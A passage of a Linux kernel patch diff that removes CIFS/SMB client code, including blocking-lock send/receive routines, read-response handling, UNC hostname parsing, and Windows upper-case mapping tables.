+-	if (!midQ->resp_buf || !out_buf ||
+-	    midQ->mid_state != MID_RESPONSE_RECEIVED) {
+-		rc = -EIO;
+-		cifs_server_dbg(VFS, "Bad MID state?\n");
+-		goto out;
+-	}
+-
+-	*pbytes_returned = get_rfc1002_length(midQ->resp_buf);
+-	memcpy(out_buf, midQ->resp_buf, *pbytes_returned + 4);
+-	rc = cifs_check_receive(midQ, server, 0);
+-out:
+-	delete_mid(midQ);
+-	add_credits(server, &credits, 0);
+-
+-	return rc;
+-}
+-
+-/* We send a LOCKINGX_CANCEL_LOCK to cause the Windows
+-   blocking lock to return. */
+-
+-static int
+-send_lock_cancel(const unsigned int xid, struct cifs_tcon *tcon,
+-			struct smb_hdr *in_buf,
+-			struct smb_hdr *out_buf)
+-{
+-	int bytes_returned;
+-	struct cifs_ses *ses = tcon->ses;
+-	LOCK_REQ *pSMB = (LOCK_REQ *)in_buf;
+-
+-	/* We just modify the current in_buf to change
+-	   the type of lock from LOCKING_ANDX_SHARED_LOCK
+-	   or LOCKING_ANDX_EXCLUSIVE_LOCK to
+-	   LOCKING_ANDX_CANCEL_LOCK. */
+-
+-	pSMB->LockType = LOCKING_ANDX_CANCEL_LOCK|LOCKING_ANDX_LARGE_FILES;
+-	pSMB->Timeout = 0;
+-	pSMB->hdr.Mid = get_next_mid(ses->server);
+-
+-	return SendReceive(xid, ses, in_buf, out_buf,
+-			&bytes_returned, 0);
+-}
+-
+-int
+-SendReceiveBlockingLock(const unsigned int xid, struct cifs_tcon *tcon,
+-	    struct smb_hdr *in_buf, struct smb_hdr *out_buf,
+-	    int *pbytes_returned)
+-{
+-	int rc = 0;
+-	int rstart = 0;
+-	struct mid_q_entry *midQ;
+-	struct cifs_ses *ses;
+-	unsigned int len = be32_to_cpu(in_buf->smb_buf_length);
+-	struct kvec iov = { .iov_base = in_buf, .iov_len = len };
+-	struct smb_rqst rqst = { .rq_iov = &iov, .rq_nvec = 1 };
+-	unsigned int instance;
+-	struct TCP_Server_Info *server;
+-
+-	if (tcon == NULL || tcon->ses == NULL) {
+-		cifs_dbg(VFS, "Null smb session\n");
+-		return -EIO;
+-	}
+-	ses = tcon->ses;
+-	server = ses->server;
+-
+-	if (server == NULL) {
+-		cifs_dbg(VFS, "Null tcp session\n");
+-		return -EIO;
+-	}
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsExiting) {
+-		spin_unlock(&server->srv_lock);
+-		return -ENOENT;
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	/* Ensure that we do not send more than 50 overlapping requests
+-	   to the same server. We may make this configurable later or
+-	   use ses->maxReq */
+-
+-	if (len > CIFSMaxBufSize + MAX_CIFS_HDR_SIZE - 4) {
+-		cifs_tcon_dbg(VFS, "Invalid length, greater than maximum frame, %d\n",
+-			      len);
+-		return -EIO;
+-	}
+-
+-	rc = wait_for_free_request(server, CIFS_BLOCKING_OP, &instance);
+-	if (rc)
+-		return rc;
+-
+-	/* make sure that we sign in the same order that we send on this socket
+-	   and avoid races inside tcp sendmsg code that could cause corruption
+-	   of smb data */
+-
+-	cifs_server_lock(server);
+-
+-	rc = allocate_mid(ses, in_buf, &midQ);
+-	if (rc) {
+-		cifs_server_unlock(server);
+-		return rc;
+-	}
+-
+-	rc = cifs_sign_smb(in_buf, server, &midQ->sequence_number);
+-	if (rc) {
+-		delete_mid(midQ);
+-		cifs_server_unlock(server);
+-		return rc;
+-	}
+-
+-	midQ->mid_state = MID_REQUEST_SUBMITTED;
+-	rc = smb_send(server, in_buf, len);
+-	cifs_save_when_sent(midQ);
+-
+-	if (rc < 0)
+-		server->sequence_number -= 2;
+-
+-	cifs_server_unlock(server);
+-
+-	if (rc < 0) {
+-		delete_mid(midQ);
+-		return rc;
+-	}
+-
+-	/* Wait for a reply - allow signals to interrupt. */
+-	rc = wait_event_interruptible(server->response_q,
+-		(!(midQ->mid_state == MID_REQUEST_SUBMITTED)) ||
+-		((server->tcpStatus != CifsGood) &&
+-		 (server->tcpStatus != CifsNew)));
+-
+-	/* Were we interrupted by a signal ? */
+-	spin_lock(&server->srv_lock);
+-	if ((rc == -ERESTARTSYS) &&
+-		(midQ->mid_state == MID_REQUEST_SUBMITTED) &&
+-		((server->tcpStatus == CifsGood) ||
+-		 (server->tcpStatus == CifsNew))) {
+-		spin_unlock(&server->srv_lock);
+-
+-		if (in_buf->Command == SMB_COM_TRANSACTION2) {
+-			/* POSIX lock. We send a NT_CANCEL SMB to cause the
+-			   blocking lock to return. */
+-			rc = send_cancel(server, &rqst, midQ);
+-			if (rc) {
+-				delete_mid(midQ);
+-				return rc;
+-			}
+-		} else {
+-			/* Windows lock. We send a LOCKINGX_CANCEL_LOCK
+-			   to cause the blocking lock to return. */
+-
+-			rc = send_lock_cancel(xid, tcon, in_buf, out_buf);
+-
+-			/* If we get -ENOLCK back the lock may have
+-			   already been removed. Don't exit in this case. */
+-			if (rc && rc != -ENOLCK) {
+-				delete_mid(midQ);
+-				return rc;
+-			}
+-		}
+-
+-		rc = wait_for_response(server, midQ);
+-		if (rc) {
+-			send_cancel(server, &rqst, midQ);
+-			spin_lock(&server->mid_lock);
+-			if (midQ->mid_state == MID_REQUEST_SUBMITTED) {
+-				/* no longer considered to be "in-flight" */
+-				midQ->callback = release_mid;
+-				spin_unlock(&server->mid_lock);
+-				return rc;
+-			}
+-			spin_unlock(&server->mid_lock);
+-		}
+-
+-		/* We got the response - restart system call. */
+-		rstart = 1;
+-		spin_lock(&server->srv_lock);
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	rc = cifs_sync_mid_result(midQ, server);
+-	if (rc != 0)
+-		return rc;
+-
+-	/* rcvd frame is ok */
+-	if (out_buf == NULL || midQ->mid_state != MID_RESPONSE_RECEIVED) {
+-		rc = -EIO;
+-		cifs_tcon_dbg(VFS, "Bad MID state?\n");
+-		goto out;
+-	}
+-
+-	*pbytes_returned = get_rfc1002_length(midQ->resp_buf);
+-	memcpy(out_buf, midQ->resp_buf, *pbytes_returned + 4);
+-	rc = cifs_check_receive(midQ, server, 0);
+-out:
+-	delete_mid(midQ);
+-	if (rstart && rc == -EACCES)
+-		return -ERESTARTSYS;
+-	return rc;
+-}
+-
+-/*
+- * Discard any remaining data in the current SMB. To do this, we borrow the
+- * current bigbuf.
+- */
+-int
+-cifs_discard_remaining_data(struct TCP_Server_Info *server)
+-{
+-	unsigned int rfclen = server->pdu_size;
+-	int remaining = rfclen + HEADER_PREAMBLE_SIZE(server) -
+-		server->total_read;
+-
+-	while (remaining > 0) {
+-		int length;
+-
+-		length = cifs_discard_from_socket(server,
+-				min_t(size_t, remaining,
+-				      CIFSMaxBufSize + MAX_HEADER_SIZE(server)));
+-		if (length < 0)
+-			return length;
+-		server->total_read += length;
+-		remaining -= length;
+-	}
+-
+-	return 0;
+-}
+-
+-static int
+-__cifs_readv_discard(struct TCP_Server_Info *server, struct mid_q_entry *mid,
+-		     bool malformed)
+-{
+-	int length;
+-
+-	length = cifs_discard_remaining_data(server);
+-	dequeue_mid(mid, malformed);
+-	mid->resp_buf = server->smallbuf;
+-	server->smallbuf = NULL;
+-	return length;
+-}
+-
+-static int
+-cifs_readv_discard(struct TCP_Server_Info *server, struct mid_q_entry *mid)
+-{
+-	struct cifs_readdata *rdata = mid->callback_data;
+-
+-	return  __cifs_readv_discard(server, mid, rdata->result);
+-}
+-
+-int
+-cifs_readv_receive(struct TCP_Server_Info *server, struct mid_q_entry *mid)
+-{
+-	int length, len;
+-	unsigned int data_offset, data_len;
+-	struct cifs_readdata *rdata = mid->callback_data;
+-	char *buf = server->smallbuf;
+-	unsigned int buflen = server->pdu_size + HEADER_PREAMBLE_SIZE(server);
+-	bool use_rdma_mr = false;
+-
+-	cifs_dbg(FYI, "%s: mid=%llu offset=%llu bytes=%u\n",
+-		 __func__, mid->mid, rdata->offset, rdata->bytes);
+-
+-	/*
+-	 * read the rest of READ_RSP header (sans Data array), or whatever we
+-	 * can if there's not enough data. At this point, we've read down to
+-	 * the Mid.
+-	 */
+-	len = min_t(unsigned int, buflen, server->vals->read_rsp_size) -
+-							HEADER_SIZE(server) + 1;
+-
+-	length = cifs_read_from_socket(server,
+-				       buf + HEADER_SIZE(server) - 1, len);
+-	if (length < 0)
+-		return length;
+-	server->total_read += length;
+-
+-	if (server->ops->is_session_expired &&
+-	    server->ops->is_session_expired(buf)) {
+-		cifs_reconnect(server, true);
+-		return -1;
+-	}
+-
+-	if (server->ops->is_status_pending &&
+-	    server->ops->is_status_pending(buf, server)) {
+-		cifs_discard_remaining_data(server);
+-		return -1;
+-	}
+-
+-	/* set up first two iov for signature check and to get credits */
+-	rdata->iov[0].iov_base = buf;
+-	rdata->iov[0].iov_len = HEADER_PREAMBLE_SIZE(server);
+-	rdata->iov[1].iov_base = buf + HEADER_PREAMBLE_SIZE(server);
+-	rdata->iov[1].iov_len =
+-		server->total_read - HEADER_PREAMBLE_SIZE(server);
+-	cifs_dbg(FYI, "0: iov_base=%p iov_len=%zu\n",
+-		 rdata->iov[0].iov_base, rdata->iov[0].iov_len);
+-	cifs_dbg(FYI, "1: iov_base=%p iov_len=%zu\n",
+-		 rdata->iov[1].iov_base, rdata->iov[1].iov_len);
+-
+-	/* Was the SMB read successful? */
+-	rdata->result = server->ops->map_error(buf, false);
+-	if (rdata->result != 0) {
+-		cifs_dbg(FYI, "%s: server returned error %d\n",
+-			 __func__, rdata->result);
+-		/* normal error on read response */
+-		return __cifs_readv_discard(server, mid, false);
+-	}
+-
+-	/* Is there enough to get to the rest of the READ_RSP header? */
+-	if (server->total_read < server->vals->read_rsp_size) {
+-		cifs_dbg(FYI, "%s: server returned short header. got=%u expected=%zu\n",
+-			 __func__, server->total_read,
+-			 server->vals->read_rsp_size);
+-		rdata->result = -EIO;
+-		return cifs_readv_discard(server, mid);
+-	}
+-
+-	data_offset = server->ops->read_data_offset(buf) +
+-		HEADER_PREAMBLE_SIZE(server);
+-	if (data_offset < server->total_read) {
+-		/*
+-		 * win2k8 sometimes sends an offset of 0 when the read
+-		 * is beyond the EOF. Treat it as if the data starts just after
+-		 * the header.
+-		 */
+-		cifs_dbg(FYI, "%s: data offset (%u) inside read response header\n",
+-			 __func__, data_offset);
+-		data_offset = server->total_read;
+-	} else if (data_offset > MAX_CIFS_SMALL_BUFFER_SIZE) {
+-		/* data_offset is beyond the end of smallbuf */
+-		cifs_dbg(FYI, "%s: data offset (%u) beyond end of smallbuf\n",
+-			 __func__, data_offset);
+-		rdata->result = -EIO;
+-		return cifs_readv_discard(server, mid);
+-	}
+-
+-	cifs_dbg(FYI, "%s: total_read=%u data_offset=%u\n",
+-		 __func__, server->total_read, data_offset);
+-
+-	len = data_offset - server->total_read;
+-	if (len > 0) {
+-		/* read any junk before data into the rest of smallbuf */
+-		length = cifs_read_from_socket(server,
+-					       buf + server->total_read, len);
+-		if (length < 0)
+-			return length;
+-		server->total_read += length;
+-	}
+-
+-	/* how much data is in the response? */
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	use_rdma_mr = rdata->mr;
+-#endif
+-	data_len = server->ops->read_data_length(buf, use_rdma_mr);
+-	if (!use_rdma_mr && (data_offset + data_len > buflen)) {
+-		/* data_len is corrupt -- discard frame */
+-		rdata->result = -EIO;
+-		return cifs_readv_discard(server, mid);
+-	}
+-
+-	length = rdata->read_into_pages(server, rdata, data_len);
+-	if (length < 0)
+-		return length;
+-
+-	server->total_read += length;
+-
+-	cifs_dbg(FYI, "total_read=%u buflen=%u remaining=%u\n",
+-		 server->total_read, buflen, data_len);
+-
+-	/* discard anything left over */
+-	if (server->total_read < buflen)
+-		return cifs_readv_discard(server, mid);
+-
+-	dequeue_mid(mid, false);
+-	mid->resp_buf = server->smallbuf;
+-	server->smallbuf = NULL;
+-	return length;
+-}
+diff --git a/fs/cifs/unc.c b/fs/cifs/unc.c
+deleted file mode 100644
+index f6fc5e343ea42..0000000000000
+--- a/fs/cifs/unc.c
++++ /dev/null
+@@ -1,69 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2020, Microsoft Corporation.
+- *
+- *   Author(s): Steve French <stfrench@microsoft.com>
+- *              Suresh Jayaraman <sjayaraman@suse.de>
+- *              Jeff Layton <jlayton@kernel.org>
+- */
+-
+-#include <linux/fs.h>
+-#include <linux/slab.h>
+-#include <linux/inet.h>
+-#include <linux/ctype.h>
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-
+-/* extract the host portion of the UNC string */
+-char *extract_hostname(const char *unc)
+-{
+-	const char *src;
+-	char *dst, *delim;
+-	unsigned int len;
+-
+-	/* skip double chars at beginning of string */
+-	/* BB: check validity of these bytes? */
+-	if (strlen(unc) < 3)
+-		return ERR_PTR(-EINVAL);
+-	for (src = unc; *src && *src == '\\'; src++)
+-		;
+-	if (!*src)
+-		return ERR_PTR(-EINVAL);
+-
+-	/* delimiter between hostname and sharename is always '\\' now */
+-	delim = strchr(src, '\\');
+-	if (!delim)
+-		return ERR_PTR(-EINVAL);
+-
+-	len = delim - src;
+-	dst = kmalloc((len + 1), GFP_KERNEL);
+-	if (dst == NULL)
+-		return ERR_PTR(-ENOMEM);
+-
+-	memcpy(dst, src, len);
+-	dst[len] = '\0';
+-
+-	return dst;
+-}
+-
+-char *extract_sharename(const char *unc)
+-{
+-	const char *src;
+-	char *delim, *dst;
+-
+-	/* skip double chars at the beginning */
+-	src = unc + 2;
+-
+-	/* share name is always preceded by '\\' now */
+-	delim = strchr(src, '\\');
+-	if (!delim)
+-		return ERR_PTR(-EINVAL);
+-	delim++;
+-
+-	/* caller has to free the memory */
+-	dst = kstrdup(delim, GFP_KERNEL);
+-	if (!dst)
+-		return ERR_PTR(-ENOMEM);
+-
+-	return dst;
+-}
+diff --git a/fs/cifs/winucase.c b/fs/cifs/winucase.c
+deleted file mode 100644
+index 2f075b5b50df0..0000000000000
+--- a/fs/cifs/winucase.c
++++ /dev/null
+@@ -1,649 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *
+- * Copyright (c) Jeffrey Layton <jlayton@redhat.com>, 2013
+- *
+- * The const tables in this file were converted from the following info
+- * provided by Microsoft:
+- *
+- * 3.1.5.3 Mapping UTF-16 Strings to Upper Case:
+- *
+- * https://msdn.microsoft.com/en-us/library/hh877830.aspx
+- * http://www.microsoft.com/en-us/download/details.aspx?displaylang=en&id=10921
+- *
+- * In particular, the table in "Windows 8 Upper Case Mapping Table.txt" was
+- * post-processed using the winucase_convert.pl script.
+- */
+-
+-#include <linux/nls.h>
+-
+-wchar_t cifs_toupper(wchar_t in);  /* quiet sparse */
+-
+-static const wchar_t t2_00[256] = {
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0041, 0x0042, 0x0043, 0x0044, 0x0045, 0x0046, 0x0047,
+-	0x0048, 0x0049, 0x004a, 0x004b, 0x004c, 0x004d, 0x004e, 0x004f,
+-	0x0050, 0x0051, 0x0052, 0x0053, 0x0054, 0x0055, 0x0056, 0x0057,
+-	0x0058, 0x0059, 0x005a, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x00c0, 0x00c1, 0x00c2, 0x00c3, 0x00c4, 0x00c5, 0x00c6, 0x00c7,
+-	0x00c8, 0x00c9, 0x00ca, 0x00cb, 0x00cc, 0x00cd, 0x00ce, 0x00cf,
+-	0x00d0, 0x00d1, 0x00d2, 0x00d3, 0x00d4, 0x00d5, 0x00d6, 0x0000,
+-	0x00d8, 0x00d9, 0x00da, 0x00db, 0x00dc, 0x00dd, 0x00de, 0x0178,
+-};
+-
+-static const wchar_t t2_01[256] = {
+-	0x0000, 0x0100, 0x0000, 0x0102, 0x0000, 0x0104, 0x0000, 0x0106,
+-	0x0000, 0x0108, 0x0000, 0x010a, 0x0000, 0x010c, 0x0000, 0x010e,
+-	0x0000, 0x0110, 0x0000, 0x0112, 0x0000, 0x0114, 0x0000, 0x0116,
+-	0x0000, 0x0118, 0x0000, 0x011a, 0x0000, 0x011c, 0x0000, 0x011e,
+-	0x0000, 0x0120, 0x0000, 0x0122, 0x0000, 0x0124, 0x0000, 0x0126,
+-	0x0000, 0x0128, 0x0000, 0x012a, 0x0000, 0x012c, 0x0000, 0x012e,
+-	0x0000, 0x0000, 0x0000, 0x0132, 0x0000, 0x0134, 0x0000, 0x0136,
+-	0x0000, 0x0000, 0x0139, 0x0000, 0x013b, 0x0000, 0x013d, 0x0000,
+-	0x013f, 0x0000, 0x0141, 0x0000, 0x0143, 0x0000, 0x0145, 0x0000,
+-	0x0147, 0x0000, 0x0000, 0x014a, 0x0000, 0x014c, 0x0000, 0x014e,
+-	0x0000, 0x0150, 0x0000, 0x0152, 0x0000, 0x0154, 0x0000, 0x0156,
+-	0x0000, 0x0158, 0x0000, 0x015a, 0x0000, 0x015c, 0x0000, 0x015e,
+-	0x0000, 0x0160, 0x0000, 0x0162, 0x0000, 0x0164, 0x0000, 0x0166,
+-	0x0000, 0x0168, 0x0000, 0x016a, 0x0000, 0x016c, 0x0000, 0x016e,
+-	0x0000, 0x0170, 0x0000, 0x0172, 0x0000, 0x0174, 0x0000, 0x0176,
+-	0x0000, 0x0000, 0x0179, 0x0000, 0x017b, 0x0000, 0x017d, 0x0000,
+-	0x0243, 0x0000, 0x0000, 0x0182, 0x0000, 0x0184, 0x0000, 0x0000,
+-	0x0187, 0x0000, 0x0000, 0x0000, 0x018b, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0191, 0x0000, 0x0000, 0x01f6, 0x0000, 0x0000,
+-	0x0000, 0x0198, 0x023d, 0x0000, 0x0000, 0x0000, 0x0220, 0x0000,
+-	0x0000, 0x01a0, 0x0000, 0x01a2, 0x0000, 0x01a4, 0x0000, 0x0000,
+-	0x01a7, 0x0000, 0x0000, 0x0000, 0x0000, 0x01ac, 0x0000, 0x0000,
+-	0x01af, 0x0000, 0x0000, 0x0000, 0x01b3, 0x0000, 0x01b5, 0x0000,
+-	0x0000, 0x01b8, 0x0000, 0x0000, 0x0000, 0x01bc, 0x0000, 0x01f7,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x01c4, 0x0000,
+-	0x0000, 0x01c7, 0x0000, 0x0000, 0x01ca, 0x0000, 0x01cd, 0x0000,
+-	0x01cf, 0x0000, 0x01d1, 0x0000, 0x01d3, 0x0000, 0x01d5, 0x0000,
+-	0x01d7, 0x0000, 0x01d9, 0x0000, 0x01db, 0x018e, 0x0000, 0x01de,
+-	0x0000, 0x01e0, 0x0000, 0x01e2, 0x0000, 0x01e4, 0x0000, 0x01e6,
+-	0x0000, 0x01e8, 0x0000, 0x01ea, 0x0000, 0x01ec, 0x0000, 0x01ee,
+-	0x0000, 0x0000, 0x0000, 0x01f1, 0x0000, 0x01f4, 0x0000, 0x0000,
+-	0x0000, 0x01f8, 0x0000, 0x01fa, 0x0000, 0x01fc, 0x0000, 0x01fe,
+-};
+-
+-static const wchar_t t2_02[256] = {
+-	0x0000, 0x0200, 0x0000, 0x0202, 0x0000, 0x0204, 0x0000, 0x0206,
+-	0x0000, 0x0208, 0x0000, 0x020a, 0x0000, 0x020c, 0x0000, 0x020e,
+-	0x0000, 0x0210, 0x0000, 0x0212, 0x0000, 0x0214, 0x0000, 0x0216,
+-	0x0000, 0x0218, 0x0000, 0x021a, 0x0000, 0x021c, 0x0000, 0x021e,
+-	0x0000, 0x0000, 0x0000, 0x0222, 0x0000, 0x0224, 0x0000, 0x0226,
+-	0x0000, 0x0228, 0x0000, 0x022a, 0x0000, 0x022c, 0x0000, 0x022e,
+-	0x0000, 0x0230, 0x0000, 0x0232, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x023b, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0241, 0x0000, 0x0000, 0x0000, 0x0000, 0x0246,
+-	0x0000, 0x0248, 0x0000, 0x024a, 0x0000, 0x024c, 0x0000, 0x024e,
+-	0x2c6f, 0x2c6d, 0x0000, 0x0181, 0x0186, 0x0000, 0x0189, 0x018a,
+-	0x0000, 0x018f, 0x0000, 0x0190, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0193, 0x0000, 0x0000, 0x0194, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0197, 0x0196, 0x0000, 0x2c62, 0x0000, 0x0000, 0x0000, 0x019c,
+-	0x0000, 0x2c6e, 0x019d, 0x0000, 0x0000, 0x019f, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2c64, 0x0000, 0x0000,
+-	0x01a6, 0x0000, 0x0000, 0x01a9, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x01ae, 0x0244, 0x01b1, 0x01b2, 0x0245, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x01b7, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_03[256] = {
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0370, 0x0000, 0x0372, 0x0000, 0x0000, 0x0000, 0x0376,
+-	0x0000, 0x0000, 0x0000, 0x03fd, 0x03fe, 0x03ff, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0386, 0x0388, 0x0389, 0x038a,
+-	0x0000, 0x0391, 0x0392, 0x0393, 0x0394, 0x0395, 0x0396, 0x0397,
+-	0x0398, 0x0399, 0x039a, 0x039b, 0x039c, 0x039d, 0x039e, 0x039f,
+-	0x03a0, 0x03a1, 0x0000, 0x03a3, 0x03a4, 0x03a5, 0x03a6, 0x03a7,
+-	0x03a8, 0x03a9, 0x03aa, 0x03ab, 0x038c, 0x038e, 0x038f, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x03cf,
+-	0x0000, 0x03d8, 0x0000, 0x03da, 0x0000, 0x03dc, 0x0000, 0x03de,
+-	0x0000, 0x03e0, 0x0000, 0x03e2, 0x0000, 0x03e4, 0x0000, 0x03e6,
+-	0x0000, 0x03e8, 0x0000, 0x03ea, 0x0000, 0x03ec, 0x0000, 0x03ee,
+-	0x0000, 0x0000, 0x03f9, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x03f7, 0x0000, 0x0000, 0x03fa, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_04[256] = {
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0410, 0x0411, 0x0412, 0x0413, 0x0414, 0x0415, 0x0416, 0x0417,
+-	0x0418, 0x0419, 0x041a, 0x041b, 0x041c, 0x041d, 0x041e, 0x041f,
+-	0x0420, 0x0421, 0x0422, 0x0423, 0x0424, 0x0425, 0x0426, 0x0427,
+-	0x0428, 0x0429, 0x042a, 0x042b, 0x042c, 0x042d, 0x042e, 0x042f,
+-	0x0400, 0x0401, 0x0402, 0x0403, 0x0404, 0x0405, 0x0406, 0x0407,
+-	0x0408, 0x0409, 0x040a, 0x040b, 0x040c, 0x040d, 0x040e, 0x040f,
+-	0x0000, 0x0460, 0x0000, 0x0462, 0x0000, 0x0464, 0x0000, 0x0466,
+-	0x0000, 0x0468, 0x0000, 0x046a, 0x0000, 0x046c, 0x0000, 0x046e,
+-	0x0000, 0x0470, 0x0000, 0x0472, 0x0000, 0x0474, 0x0000, 0x0476,
+-	0x0000, 0x0478, 0x0000, 0x047a, 0x0000, 0x047c, 0x0000, 0x047e,
